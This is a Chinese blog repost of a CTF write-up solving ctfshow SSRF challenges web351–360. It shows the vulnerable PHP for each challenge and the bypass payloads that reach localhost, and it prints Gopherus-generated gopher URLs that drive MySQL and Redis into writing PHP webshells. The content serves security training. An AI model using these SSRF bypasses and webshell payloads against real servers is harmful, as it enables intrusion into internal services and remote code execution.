子比主题,更优雅的Wordpress主题
更优雅的WordPress网站主题:子比主题!全面开启

php代码审计前奏之ctfshow之SSRF – 作者:yanmie

0130

本系列题目来源:CTFSHOW: https://ctf.show/challenges

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)

https://ctf-wiki.org/web/ssrf/

web351

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>

curl_init — 初始化 cURL 会话

curl_setopt — 设置一个cURL传输选项。

CURLOPT_HEADER 启用时会将头文件的信息作为数据流输出。
URLOPT_RETURNTRANSFER 将curl_exec()获取的信息以文件流的形式返回,而不是直接输出。

curl_exec — 执行 cURL 会话

curl_close — 关闭 cURL 会话

如果我们直接访问,会输出

非本地用户禁止访问

所以需ssrf读取flag, payload:

# POST
url=http://127.0.0.1/flag.php

web352~过滤127.0.0,localhost

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127.0.0/')){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> hacker

parse_url — 解析 URL,返回其组成部分

这里过滤了/localhost|127.0.0/,

假的吧,都可以出来,

url=http://localhost/flag.php
url=http://127.0.0.1/flag.php

在本地尝试尝试绕过:

ping 127.0.1
ping 127.1
ping 0x7F.0.0.1
ping 0177.0.0.1

题目尝试也可绕过。

web353

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127\.0\.|\。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> hacker

直接绕过:

url=http://127.1/flag.php
url=http://0x7F.0.0.1/flag.php
url=http://0177.0.0.1/flag.php

web354

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|1|0|。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> hacker

直接把1和·0也给过滤了。

可以

将自己域名A记录指向127.0.0.1

[http://sudo.cc/](http://sudo.cc/)正好指向127.0.0.1

302跳转

<?php
header("Location: http://127.0.0.1/flag.php");

# POST: url=http://your-domain/ssrf.php

web355

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=5)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> hacker

这里要求$x['host']长度不大于5.

直接,127.1正好是5

url=http://127.1/flag.php

还可找一个域名长度不大于5的域名 A 记录解析到127.0.0.1.

web356

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=3)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> hacker

这回更绝,长度不大于 3 .

0在linux系统中会解析成127.0.0.1在windows中解析成0.0.0.0

payload:

url=http://0/flag.php

web357

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$ip = gethostbyname($x['host']);
echo '</br>'.$ip.'</br>';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
    die('ip!');
}


echo file_get_contents($_POST['url']);
}
else{
    die('scheme');
}
?> scheme

域名解析到vps,

ssrf.php

<?php
header("Location: http://127.0.0.1/flag.php");

image-20210203151622717

web358

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
    echo file_get_contents($url);
}

正则表达式的意思是以http://ctf.开头,以show结尾。

payload:

url=http://[email protected]/flag.php?show

web359~打mysql

打无密码的mysql

https://www.freebuf.com/articles/web/260806.html

git clone https://github.com/tarunkant/Gopherus.git

python gopherus.py

[root@p1 Gopherus]# python gopherus.py --exploit mysql


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

		author: $_SpyD3r_$

For making it work username should not be password protected!!!

Give MySQL username: root
Give query to execute: select '<?php eval($_POST[1]);?>' into outfile '/var/www/html/ma.php';

Your gopher link is ready to do SSRF : 

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%47%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%6d%61%2e%70%68%70%27%3b%01%00%00%00%01

然后传到check.php中post: returl=xxxxx,但是不要忘了把下划线后面的内容url编码一次.

浏览器会对此url进行一次解码,解码后的url可能会含特殊字符,curl提交时需再次编码.

returl=gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2547%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2527%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2531%255d%2529%253b%253f%253e%2527%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%256d%2561%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501

之后就会生成ma.php.

web360~打redis

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>

和上题差不多

[root@p1 Gopherus]# python gopherus.py --exploit redis


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

		author: $_SpyD3r_$


Ready To get SHELL

What do you want?? (ReverseShell/PHPShell): PHPshell

Give web root location of server (default is /var/www/html): 
Give PHP Payload (We have default PHP Shell): <?=system('ls /');?>

Your gopher link is Ready to get PHP Shell: 

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2424%0D%0A%0A%0A%3C%3F%3Dsystem%28%27ls%20/%27%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

When it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter.

来源:freebuf.com 2021-02-10 16:32:10 by: yanmie

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
安全网站文章
喜欢就支持一下吧
点赞0
分享
相关推荐
安全小百科-公司成功上市啦! – 作者:KOAL格尔国信
公司成功上市啦! – 作者:KOAL格尔国信
公司成功上市啦! – 作者:KOAL格尔国信
3年前 4811
安全小百科-GeoServer漏洞利用总结及案例参考 – 作者:vlong6
GeoServer漏洞利用总结及案例参考 – 作者:vlong6
GeoServer漏洞利用总结及案例参考 – 作者:vlong6
3年前 1568
安全小百科-科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa
科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa
科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa
3年前 868
安全小百科-Thinkphp v5.1.41反序列化漏洞分析及EXP – 作者:4ut15m
Thinkphp v5.1.41反序列化漏洞分析及EXP – 作者:4ut15m
Thinkphp v5.1.41反序列化漏洞分析及EXP – 作者:4ut15m
3年前 738
安全小百科-Citrix未授权漏洞cve-2020-8193个人复现 – 作者:AEKiller
Citrix未授权漏洞cve-2020-8193个人复现 – 作者:AEKiller
Citrix未授权漏洞cve-2020-8193个人复现 – 作者:AEKiller
3年前 626
安全小百科-『渗透测试』记一次简单的 CMS 漏洞挖掘 – 作者:宸极实验室Sec
『渗透测试』记一次简单的 CMS 漏洞挖掘 – 作者:宸极实验室Sec
『渗透测试』记一次简单的 CMS 漏洞挖掘 – 作者:宸极实验室Sec
3年前 540
评论 抢沙发

请登录后发表评论

搜索
开启精彩搜索
标签云
龟背龚某龙鱼龙马龙首龙车龙身龙芯龙生九子龙火龙海市龙泉驿区龙岩市龙女龙南县龙凤龙伯龍首龍門龍身
公司成功上市啦! - 作者:KOAL格尔国信-安全小百科

公司成功上市啦! – 作者:KOAL格尔国信

admin的头像-安全小百科3年前
048110
Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion-安全小百科

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

admin的头像-安全小百科3年前
47320
GeoServer漏洞利用总结及案例参考 - 作者:vlong6-安全小百科

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

admin的头像-安全小百科3年前
015680
女祭女戚-安全小百科

女祭女戚

admin的头像-安全小百科3年前
011240
帆软10.0 Getshell漏洞分析-安全小百科

帆软10.0 Getshell漏洞分析

admin的头像-安全小百科3年前
010260
科锐逆向线上班完整版视频2020年 - 作者:hgjhf63fa-安全小百科

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa

admin的头像-安全小百科3年前
08680
恐龙抗狼扛的头像-安全小百科

恐龙抗狼扛8月前0

kankan
admin的头像-安全小百科

啊啊啊啊3年前0

66666666666666